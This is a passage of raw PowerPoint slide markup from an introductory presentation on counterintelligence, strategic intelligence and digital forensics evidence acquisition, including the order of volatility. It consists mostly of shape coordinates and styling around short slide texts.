                  <a:pt x="212821" y="117899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249275" y="91627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287858" y="68318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328404" y="48137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370745" y="31252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="414716" y="17829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="460149" y="8035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506878" y="2036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554735" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5538216" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5586073" y="2036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5632802" y="8035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5678235" y="17829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5722206" y="31252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5764547" y="48137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5805093" y="68318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5843676" y="91627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5880130" y="117899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5914289" y="146966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5945985" y="178662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5975052" y="212821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6001324" y="249275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6024633" y="287858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6044814" y="328404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6061699" y="370745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6075122" y="414716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6084916" y="460149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6090915" y="506878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6092952" y="554736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6092952" y="2773679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6090915" y="2821537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6084916" y="2868266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6075122" y="2913699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6061699" y="2957670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6044814" y="3000011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6024633" y="3040557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6001324" y="3079140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5975052" y="3115594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5945985" y="3149753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5914289" y="3181449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5880130" y="3210516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5843676" y="3236788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5805093" y="3260097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5764547" y="3280278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5722206" y="3297163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5678235" y="3310586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5632802" y="3320380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5586073" y="3326379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5538216" y="3328416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554735" y="3328416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506878" y="3326379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="460149" y="3320380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="414716" y="3310586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370745" y="3297163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328404" y="3280278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287858" y="3260097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249275" y="3236788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212821" y="3210516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178662" y="3181449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146966" y="3149753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117899" y="3115594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91627" y="3079140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68318" y="3040557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48137" y="3000011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31252" y="2957670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17829" y="2913699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8035" y="2868266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2036" y="2821537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2773679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="554736"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="EE63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75257" y="4948556"/>
            <a:ext cx="5552440" cy="155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-4445">
              <a:lnSpc>
                <a:spcPct val="113999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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It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analyzes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adversary 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Tactics,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Techniques,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Procedures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110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(TTP),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develops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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>better </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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control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configurations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to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strengthen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 investigation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process.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59173" y="306451"/>
            <a:ext cx="813943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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Counterintelligence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intelligence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2319527" y="3483864"/>
            <a:ext cx="4411980" cy="906780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4411980" h="906779">
                <a:moveTo>
                  <a:pt x="4260850" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="151130" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103371" y="7707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61886" y="29167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29167" y="61886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7707" y="103371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="151130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="755650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7707" y="803408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29167" y="844893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61886" y="877612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103371" y="899072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151130" y="906780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4260850" y="906780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4308608" y="899072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4350093" y="877612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4382812" y="844893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404272" y="803408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="755650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="151130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404272" y="103371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4382812" y="61886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4350093" y="29167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4308608" y="7707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4260850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244976" y="3742436"/>
            <a:ext cx="255841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20">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Counterintelligence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795004" y="3954779"/>
            <a:ext cx="6196965" cy="3282950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6196965" h="3282950">
                <a:moveTo>
                  <a:pt x="0" y="547116"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2008" y="499913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7924" y="453824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17583" y="409014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30821" y="365646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47473" y="323886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67376" y="283897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90364" y="245844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116274" y="209890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144941" y="176202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176202" y="144941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209890" y="116274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245844" y="90364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283897" y="67376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323886" y="47473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365646" y="30821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409014" y="17583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453824" y="7924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499913" y="2008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5649467" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5696670" y="2008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5742759" y="7924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5787569" y="17583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830937" y="30821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5872697" y="47473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5912686" y="67376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5950739" y="90364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5986693" y="116274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6020381" y="144941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6051642" y="176202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6080309" y="209890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6106219" y="245844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6129207" y="283897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149110" y="323886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6165762" y="365646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6179000" y="409014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6188659" y="453824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6194575" y="499913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6196584" y="547116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6196584" y="2735580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6194575" y="2782782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6188659" y="2828871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6179000" y="2873681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6165762" y="2917049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149110" y="2958809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6129207" y="2998798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6106219" y="3036851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6080309" y="3072805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6051642" y="3106493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6020381" y="3137754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5986693" y="3166421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5950739" y="3192331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5912686" y="3215319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5872697" y="3235222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830937" y="3251874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5787569" y="3265112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5742759" y="3274771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5696670" y="3280687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5649467" y="3282696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547116" y="3282696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499913" y="3280687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453824" y="3274771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409014" y="3265112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365646" y="3251874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323886" y="3235222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283897" y="3215319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245844" y="3192331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209890" y="3166421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176202" y="3137754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144941" y="3106493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116274" y="3072805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90364" y="3036851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67376" y="2998798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47473" y="2958809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30821" y="2917049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17583" y="2873681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7924" y="2828871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2008" y="2782782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2735580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="547116"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524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407143" y="4779035"/>
            <a:ext cx="4970780" cy="15563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1270">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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It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informs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risk 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management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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="11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security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control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provisioning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to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build </a:t>
            </a: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mature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cyber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security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>capabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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ensure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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>that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there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isn’t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any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intrusion.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012680" y="3396996"/>
            <a:ext cx="4226560" cy="942340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4226559" h="942339">
                <a:moveTo>
                  <a:pt x="4069079" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="156972" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107338" y="7997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64245" y="30272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30272" y="64245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7997" y="107338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="156971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="784859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7997" y="834493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30272" y="877586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64245" y="911559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107338" y="933834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156972" y="941831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4069079" y="941831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4118713" y="933834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4161806" y="911559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4195779" y="877586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4218054" y="834493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4226052" y="784859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4226052" y="156971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4218054" y="107338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4195779" y="64245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4161806" y="30272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4118713" y="7997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4069079" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4279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0767441" y="3672332"/>
            <a:ext cx="271843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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Strategic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Intelligence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74035" y="760476"/>
            <a:ext cx="11268456" cy="36575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765173" y="1754772"/>
            <a:ext cx="12680950" cy="1046480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1873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475"/>
              </a:spcBef>
            </a:pP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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>guard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against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espionage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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>hacking,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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>digital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forensics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can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be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employed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obtain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information.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="2540">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1380"/>
              </a:spcBef>
            </a:pP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This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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>intelligence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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deployed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two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ways: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6121" y="4258436"/>
            <a:ext cx="6684009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10"/>
              <a:t>Digital</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80"/>
              <a:t>Forensics</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="60"/>
              <a:t>Evidence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>Acquisition</a:t>
            </a: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23308" y="306451"/>
            <a:ext cx="7007859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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data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100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acquisition</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Order</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Volatility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2676" y="760476"/>
            <a:ext cx="10152888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864352" y="4483608"/>
            <a:ext cx="4953000" cy="3209925"/>
            <a:chOff x="5864352" y="4483608"/>
            <a:chExt cx="4953000" cy="320992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64352" y="4483608"/>
              <a:ext cx="4953000" cy="320954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53756" y="5824728"/>
              <a:ext cx="891540" cy="89306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230626" y="6815455"/>
            <a:ext cx="2283460" cy="69723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24765" marR="5080" indent="-12700">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pP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Legal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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seizure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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search</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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12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devices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43461" y="6815455"/>
            <a:ext cx="1136015" cy="69723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26034" marR="5080" indent="-13970">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Order</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>volatility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91180" y="1754772"/>
            <a:ext cx="11028045" cy="2376805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1873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475"/>
              </a:spcBef>
            </a:pP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Acquisition</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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process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obtaining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forensically</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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clean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copy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data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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from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device</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="6985">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1380"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>tha</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>t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he</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>d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2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dirty="0" sz="2200" spc="95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>s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n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eviden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c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
